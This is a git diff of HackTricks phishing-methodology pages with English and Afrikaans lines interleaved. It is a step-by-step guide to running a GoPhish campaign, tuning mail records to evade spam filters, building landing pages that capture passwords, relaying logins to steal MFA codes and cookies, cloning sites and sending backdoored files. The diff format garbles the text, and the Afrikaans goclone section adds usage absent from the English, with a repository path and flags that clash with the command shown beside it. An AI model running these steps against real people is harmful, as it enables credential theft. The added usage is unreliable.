Om die gophish-diens te skep sodat dit outomaties gestart en bestuur kan word as 'n diens, kan jy die lêer `/etc/init.d/gophish` skep met die volgende inhoud:
```bash
#!/bin/bash
# /etc/init.d/gophish
@ -203,35 +194,33 @@ logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error
start() {
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
}
stop() {
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
}
status() {
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
}
case $1 in
start|stop|status) "$1" ;;
start|stop|status) "$1" ;;
esac
```
Finish configuring the service and checking it doing:
Voltooi die konfigurasie van die diens en toets dit deur die volgende stappe te volg:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
@ -242,69 +231,60 @@ service gophish status
ss -l | grep "3333\|443"
service gophish stop
```
## Konfigureer posdiens en domein
## Configuring mail server and domain
### Wag en wees legitiem
### Wait & be legit
Hoe ouer 'n domein is, hoe minder waarskynlik is dit dat dit as spam gevang sal word. Jy moet dus so lank as moontlik wag (ten minste 1 week) voordat jy die phising-assessering doen. Verder sal die reputasie wat verkry word beter wees as jy 'n bladsy oor 'n reputasievolle sektor plaas.
The older a domain is the less probable it's going to be caught as spam. Then you should wait as much time as possible (at least 1week) before the phishing assessment. moreover, if you put a page about a reputational sector the reputation obtained will be better.
Let daarop dat selfs al moet jy 'n week wag, jy alles nou kan konfigureer.
Note that even if you have to wait a week you can finish configuring everything now.
### Konfigureer omgekeerde DNS (rDNS) rekord
### Configure Reverse DNS (rDNS) record
Stel 'n rDNS (PTR) rekord in wat die IP-adres van die VPS na die domeinnaam oplos.
Set a rDNS (PTR) record that resolves the IP address of the VPS to the domain name.
### Sender Policy Framework (SPF) Rekord
### Sender Policy Framework (SPF) Record
Jy moet **'n SPF-rekord vir die nuwe domein konfigureer**. As jy nie weet wat 'n SPF-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#spf).
You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../../network-services-pentesting/pentesting-smtp/#spf).
You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
Jy kan [https://www.spfwizard.net/](https://www.spfwizard.net) gebruik om jou SPF-beleid te genereer (gebruik die IP van die VPS-masjien)
![](<../../.gitbook/assets/image (388).png>)
This is the content that must be set inside a TXT record inside the domain:
Dit is die inhoud wat binne 'n TXT-rekord in die domein ingestel moet word:
```bash
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
### Domeingebaseerde Berigverifikasie, Rapportering en Nakoming (DMARC) Rekord
### Domain-based Message Authentication, Reporting & Conformance (DMARC) Record
You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dmarc).
You have to create a new DNS TXT record pointing the hostname `_dmarc.<domain>` with the following content:
Jy moet 'n DMARC-rekord **konfigureer vir die nuwe domein**. As jy nie weet wat 'n DMARC-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#dmarc).
Jy moet 'n nuwe DNS TXT-rekord skep wat die gasheernaam `_dmarc.<domein>` na die volgende inhoud verwys:
```bash
v=DMARC1; p=none
```
### DomainKeys Identified Mail (DKIM)
You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dkim).
Jy moet 'n DKIM vir die nuwe domein **konfigureer**. As jy nie weet wat 'n DMARC-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
Hierdie handleiding is gebaseer op: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
{% hint style="info" %}
You need to concatenate both B64 values that the DKIM key generates:
Jy moet beide B64-waardes wat die DKIM-sleutel genereer, saamvoeg:
```
v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB
```
{% endhint %}
### Test your email configuration score
You can do that using [https://www.mail-tester.com/](https://www.mail-tester.com)\
Just access the page and send an email to the address they give you:
### Toets jou e-pos konfigurasie telling
Jy kan dit doen deur gebruik te maak van [https://www.mail-tester.com/](https://www.mail-tester.com)\
Net toegang tot die bladsy en stuur 'n e-pos na die adres wat hulle aan jou gee:
```bash
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
```
You can also **check your email configuration** sending an email to `check-auth@verifier.port25.com` and **reading the response** (for this you will need to **open** port **25** and see the response in the file _/var/mail/root_ if you send the email a as root).\
Check that you pass all the tests:
Jy kan ook **jou e-pos konfigurasie nagaan** deur 'n e-pos te stuur na `check-auth@verifier.port25.com` en **die antwoord te lees** (hiervoor sal jy die poort **25** moet **oopmaak** en die antwoord in die lêer _/var/mail/root_ sien as jy die e-pos as root stuur).\
Maak seker dat jy slaag vir al die toetse:
```bash
==========================================================
Summary of Results
@ -315,49 +295,45 @@ DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham
```
You could also send **message to a Gmail under your control**, and check the **emails headers** in your Gmail inbox, `dkim=pass` should be present in the `Authentication-Results` header field.
Jy kan ook 'n **boodskap na 'n Gmail onder jou beheer** stuur en die **e-pos se koppe** in jou Gmail-inboks nagaan, `dkim=pass` moet teenwoordig wees in die `Authentication-Results` kopvel.
```
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
```
### Verwydering van Spamhouse Blacklist
### Removing from Spamhouse Blacklist
Die bladsy [www.mail-tester.com](www.mail-tester.com) kan aandui of jou domein deur Spamhouse geblokkeer word. Jy kan versoek dat jou domein/IP verwyder word by: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
The page [www.mail-tester.com](www.mail-tester.com) can indicate you if you your domain is being blocked by spamhouse. You can request your domain/IP to be removed at: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
### Verwydering van Microsoft Blacklist
### Removing from Microsoft Blacklist
Jy kan versoek dat jou domein/IP verwyder word by [https://sender.office.com/](https://sender.office.com).
You can request your domain/IP to be removed at [https://sender.office.com/](https://sender.office.com).
## Skep & Lanseer GoPhish-veldtog
## Create & Launch GoPhish Campaign
### Verstuurprofiel
### Sending Profile
* Set some **name to identify** the sender profile
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
* Stel 'n **naam in om** die verstuurprofiel te identifiseer
* Besluit van watter rekening jy die phising-e-posse gaan stuur. Voorstelle: _noreply, support, servicedesk, salesforce..._
* Jy kan die gebruikersnaam en wagwoord leeg laat, maar maak seker om die "Ignore Certificate Errors" te merk
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (17).png>)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
Dit word aanbeveel om die "**Send Test Email**" funksionaliteit te gebruik om te toets of alles werk.\
Ek sal aanbeveel om die toets-e-posse na 10min-posadressse te stuur om te voorkom dat jy op die swartlys beland terwyl jy toetse doen.
{% endhint %}
### Email Template
* Set some **name to identify** the template
* Then write a **subject** (nothing estrange, just something you could expect to read in a regular email)
* Make sure you have checked "**Add Tracking Image**"
* Write the **email template** (you can use variables like in the following example):
### E-pos-sjabloon
* Stel 'n **naam in om** die sjabloon te identifiseer
* Skryf dan 'n **onderwerp** (niks vreemds nie, net iets wat jy in 'n gewone e-pos sou verwag om te lees)
* Maak seker dat jy "**Add Tracking Image**" gemerk het
* Skryf die **e-pos-sjabloon** (jy kan veranderlikes gebruik soos in die volgende voorbeeld):
```markup
<html>
<head>
<title></title>
<title></title>
</head>
<body>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
@ -372,127 +348,101 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
</body>
</html>
```
Let daarop dat **om die geloofwaardigheid van die e-pos te verhoog**, dit aanbeveel word om 'n handtekening van 'n e-pos van die kliënt te gebruik. Voorstelle:
Note that **in order to increase the credibility of the email**, it's recommended to use some signature from an email from the client. Suggestions:
* Send an email to a **non existent address** and check if the response has any signature.
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
* Try to contact **some valid discovered** email and wait for the response
* Stuur 'n e-pos na 'n **nie-bestaande adres** en kyk of die reaksie enige handtekening het.
* Soek na **openbare e-posse** soos info@ex.com of press@ex.com of public@ex.com en stuur hulle 'n e-pos en wag vir die reaksie.
* Probeer om **'n geldige ontdekte** e-pos te kontak en wag vir die reaksie.
![](<../../.gitbook/assets/image (393).png>)
{% hint style="info" %}
The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
Die E-pos Templaat maak dit ook moontlik om **lêers aan te heg om te stuur**. As jy ook NTLM-uitdagings wil steel deur van spesiaal vervaardigde lêers/dokumente gebruik te maak, [lees hierdie bladsy](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
{% endhint %}
### Landing Page
### Landingsbladsy
* Write a **name**
* **Write the HTML code** of the web page. Note that you can **import** web pages.
* Mark **Capture Submitted Data** and **Capture Passwords**
* Set a **redirection**
* Skryf 'n **naam**
* **Skryf die HTML-kode** van die webbladsy. Let daarop dat jy webbladsye kan **importe**.
* Merk **Vasgevang Data** en **Vasgevang Wagwoorde**
* Stel 'n **omleiding** in
![](<../../.gitbook/assets/image (394).png>)
{% hint style="info" %}
Usually you will need to modify the HTML code of the page and make some tests in local (maybe using some Apache server) **until you like the results.** Then, write that HTML code in the box.\
Note that if you need to **use some static resources** for the HTML (maybe some CSS and JS pages) you can save them in _**/opt/gophish/static/endpoint**_ and then access them from _**/static/\<filename>**_
Gewoonlik sal jy die HTML-kode van die bladsy moet wysig en 'n paar toetse plaaslik doen (dalk deur van 'n Apache-bediener gebruik te maak) **tot jy tevrede is met die resultate**. Skryf dan daardie HTML-kode in die blokkie.\
Let daarop dat as jy **van statiese hulpbronne** vir die HTML gebruik (dalk van CSS- en JS-bladsye), jy hulle kan stoor in _**/opt/gophish/static/endpoint**_ en dan daarna toegang daartoe kan verkry vanaf _**/static/\<lêernaam>**_
{% endhint %}
{% hint style="info" %}
For the redirection you could **redirect the users to the legit main web page** of the victim, or redirect them to _/static/migration.html_ for example, put some **spinning wheel (**[**https://loading.io/**](https://loading.io)**) for 5 seconds and then indicate that the process was successful**.
Vir die omleiding kan jy die gebruikers **omlei na die regmatige hoofwebbladsy** van die slagoffer, of hulle omlei na _/static/migration.html_ byvoorbeeld, 'n **draaiwiel** ([**https://loading.io/**](https://loading.io)) vir 5 sekondes plaas en dan aandui dat die proses suksesvol was.
{% endhint %}
### Users & Groups
### Gebruikers & Groepe
* Set a name
* **Import the data** (note that in order to use the template for the example you need the firstname, last name and email address of each user)
* Stel 'n naam in
* **Importeer die data** (let daarop dat jy die voornaam, van en e-posadres van elke gebruiker nodig het om die templaat vir die voorbeeld te gebruik)
![](<../../.gitbook/assets/image (395).png>)
### Campaign
### Veldtog
Finally, create a campaign selecting a name, the email template, the landing page, the URL, the sending profile and the group. Note that the URL will be the link sent to the victims
Skep uiteindelik 'n veldtog deur 'n naam, die e-pos templaat, die landingsbladsy, die URL, die stuurprofiel en die groep te kies. Let daarop dat die URL die skakel is wat na die slagoffers gestuur word.
Note that the **Sending Profile allow to send a test email to see how will the final phishing email looks like**:
Let daarop dat die **Stuurprofiel toelaat om 'n toets-e-pos te stuur om te sien hoe die uiteindelike phising-e-pos lyk**:
![](<../../.gitbook/assets/image (396).png>)
{% hint style="info" %}
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
Ek sal aanbeveel om die toets-e-posse na 10min-e-posadresse te stuur om te verhoed dat jy deur toetse op 'n swartlys geplaas word.
{% endhint %}
Once everything is ready, just launch the campaign!
Sodra alles gereed is, begin die veldtog!
## Website Cloning
## Webwerfkloning
If for any reason you want to clone the website check the following page:
As jy om enige rede die webwerf wil kloon, kyk na die volgende bladsy:
{% content-ref url="clone-a-website.md" %}
[clone-a-website.md](clone-a-website.md)
{% endcontent-ref %}
## Backdoored Documents & Files
## Terugdeur-dokumente & -lêers
In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\
Check out the following page for some examples:
In sommige phising-assesserings (veral vir Rooi Spanne) wil jy ook **lêers stuur wat 'n sekere soort terugdeur bevat** (dalk 'n C2 of dalk net iets wat 'n outentifikasie sal inisieer).\
Kyk na die volgende bladsy vir voorbeelde:
{% content-ref url="phishing-documents.md" %}
[phishing-documents.md](phishing-documents.md)
{% endcontent-ref %}
## Phishing MFA
## Phising MFA
### Via Proxy MitM
The previous attack is pretty clever as you are faking a real website and gathering the information set by the user. Unfortunately, if the user didn't put the correct password or if the application you faked is configured with 2FA, **this information won't allow you to impersonate the tricked user**.
Die vorige aanval is redelik slim omdat jy 'n regte webwerf naboots en die inligting wat deur die gebruiker ingevoer is, versamel. Ongelukkig, as die gebruiker nie die korrekte wagwoord ingevoer het nie of as die toepassing wat jy nageboots het, met 2FA gekonfigureer is, **sal hierdie inligting jou nie in staat stel om die bedriegde gebruiker na te boots nie**.
This is where tools like [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) and [**muraena**](https://github.com/muraenateam/muraena) are useful. This tool will allow you to generate a MitM like attack. Basically, the attacks works in the following way:
Dit is waar hulpmiddels soos [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) en [**muraena**](https://github.com/muraenateam/muraena) nuttig is. Hierdie hulpmiddel sal jou in staat stel om 'n MitM-soort aanval te genereer. Die aanval werk basies soos volg:
1. You **impersonate the login** form of the real webpage.
2. The user **send** his **credentials** to your fake page and the tool send those to the real webpage, **checking if the credentials work**.
3. If the account is configured with **2FA**, the MitM page will ask for it and once the **user introduces** it the tool will send it to the real web page.
4. Once the user is authenticated you (as attacker) will have **captured the credentials, the 2FA, the cookie and any information** of every interaction your while the tool is performing a MitM.
1. Jy **boots die aanmeldingsvorm** van die regte webbladsy na.
2. Die gebruiker **stuur** sy **inskrywings** na jou valse bladsy en die hulpmiddel stuur dit na die regte webbladsy, **deur te kyk of die inligting werk**.
3. As die rekening met **2FA** gekonfigureer is, sal die MitM-bladsy daarvoor vra en sodra die **gebruiker dit invoer**, sal die hulpmiddel dit na die regte webbladsy stuur.
4. Sodra die gebruiker geïdentifiseer is, sal jy (as aanvaller) die **inskrywings, die 2FA, die koekie en enige inligting** van elke interaksie wat jy tydens die MitM-uitvoer van die hulpmiddel uitvoer, **vasgevang het**.
### Via VNC
What if instead of **sending the victim to a malicious page** with the same looks as the original one, you send him to a **VNC session with a browser connected to the real web page**? You will be able to see what he does, steal the password, the MFA used, the cookies...\
You can do this with [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
Wat as jy die slagoffer in plaas daarvan **na 'n skadelike bladsy stuur** met dieselfde voorkoms as die oorspronklike een, hom na 'n **VNC-sessie met 'n blaaier wat aan die regte webbladsy gekoppel is**, stuur? Jy sal kan sien wat hy doen, die wagwoord steel, die gebruikte MFA, die koekies...\
Jy kan dit doen met [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
## Detecting the detection
## Die opsporing van die opsporing
Obviously one of the best ways to know if you have been busted is to **search your domain inside blacklists**. If it appears listed, somehow your domain was detected as suspicions.\
One easy way to check if you domain appears in any blacklist is to use [https://malwareworld.com/](https://malwareworld.com)
Dit is vanselfsprekend een van die beste maniere om te weet of jy gevang is, is om jou domein in swartlyste te soek. As dit gelys word, is jou domein op een of ander manier as verdag geïdentifiseer.\
Een maklike manier om te kyk of jou domein op enige swartlys verskyn, is deur [https://malwareworld.com/](https://malwareworld.com) te gebruik
However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in:
Daar is egter ander maniere om te weet of die slagoffer **aktief op soek is na verdagte phising-aktiwiteit in die wildernis**, soos verduidelik in:
{% content-ref url="detecting-phising.md" %}
[detecting-phising.md](detecting-phising.md)
{% endcontent-ref %}
You can **buy a domain with a very similar name** to the victims domain **and/or generate a certificate** for a **subdomain** of a domain controlled by you **containing** the **keyword** of the victim's domain. If the **victim** perform any kind of **DNS or HTTP interaction** with them, you will know that **he is actively looking** for suspicious domains and you will need to be very stealth.
### Evaluate the phishing
Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
## References
* [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
* [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
* [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
* [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Jy kan 'n domein **koop met 'n baie soortgelyke naam** as die slagoffer se domein **en/of 'n sertifikaat genereer** vir 'n **subdomein** van 'n domein wat deur jou beheer word **wat die sleutelwoord** van die slagoffer

83
generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
View file

@ -1,59 +1,88 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
For a phishing assessment sometimes it might be useful to completely **clone a website**.
Vir 'n phising-assessering kan dit soms nuttig wees om 'n webwerf heeltemal te **kloneer**.
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
Let daarop dat jy ook sekere ladinge by die gekloonde webwerf kan voeg, soos 'n BeEF-haak om die tabblad van die gebruiker te "beheer".
There are different tools you can use for this purpose:
Daar is verskillende gereedskap wat jy vir hierdie doel kan gebruik:
## wget
```text
wget -mk -nH
```
## gokloon
## goclone
Hierdie hulpmiddel word gebruik om 'n webwerf te kloon en 'n identiese kopie daarvan te skep. Dit kan gebruik word vir phising-aanvalle waar 'n aanvaller 'n nagemaakte weergawe van 'n legitieme webwerf skep om gebruikers se inligting te bekom.
### Gebruik
1. Installeer die `goclone`-hulpmiddel deur die opdrag `go get github.com/muhammadmuzzammil1998/goclone` uit te voer.
2. Voer die opdrag `goclone -url <URL> -output <UITSET>` uit, waar `<URL>` die URL van die te kloon webwerf is en `<UITSET>` die uitsetgids is waarin die gekloonde webwerf gestoor moet word.
3. Die hulpmiddel sal die webwerf kloon en al die nodige lêers en bronne in die opgegeven uitsetgids stoor.
### Voorbeelde
- Kloon 'n webwerf en stoor dit in die huidige gids:
```
goclone -url https://www.example.com -output .
```
- Kloon 'n webwerf en stoor dit in 'n spesifieke gids:
```
goclone -url https://www.example.com -output /path/to/output
```
### Waarskuwing
Dit is belangrik om te onthou dat die kloning van 'n webwerf sonder toestemming van die eienaar onwettig is. Hierdie hulpmiddel moet slegs gebruik word vir wettige doeleindes, soos toegelaat deur die wet.
```bash
#https://github.com/imthaghost/goclone
goclone <url>
```
## Sosiale Ingenieurswese Gereedskapskis
## Social Engineering Toolit
### Kloon 'n Webwerf
Hierdie metode behels die kloning van 'n bestaande webwerf om gebruikers se inligting te verkry deur middel van sosiale ingenieurswese. Hier is die stappe wat gevolg kan word om 'n webwerf te kloon:
1. Identifiseer die teikenwebwerf wat jy wil kloon.
2. Skep 'n nuwe webwerf of subdomein wat soortgelyk is aan die teikenwebwerf.
3. Kry toegang tot die bronkode van die teikenwebwerf.
4. Analiseer die bronkode om die struktuur en funksionaliteit van die webwerf te verstaan.
5. Skep 'n kopie van die webwerf se ontwerp en inhoud.
6. Pas die gekloonde webwerf aan om dit soortgelyk aan die teikenwebwerf te maak.
7. Stel 'n valse aanmeldingsbladsy op wat gebruikers se inligting sal onderskep.
8. Stuur 'n phising-e-pos na die teikengebruikers om hulle na die gekloonde webwerf te lok.
9. Monitor die gekloonde webwerf vir inkomende aanmeldingsinligting.
10. Onttrek die verkrygde inligting en gebruik dit vir verdere aanvalle of identiteitsdiefstal.
Dit is belangrik om te onthou dat die kloning van 'n webwerf sonder toestemming onwettig is en ernstige gevolge kan hê. Hierdie metode moet slegs gebruik word vir wettige doeleindes, soos om bewusmaking oor sosiale ingenieurswese te skep of om sekuriteitslekke in 'n webwerf te identifiseer.
```bash
#https://github.com/trustedsec/social-engineer-toolkit
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

95
generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
View file

@ -1,95 +1,92 @@
# Detecting Phising
# Op die spoor van Phishing
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
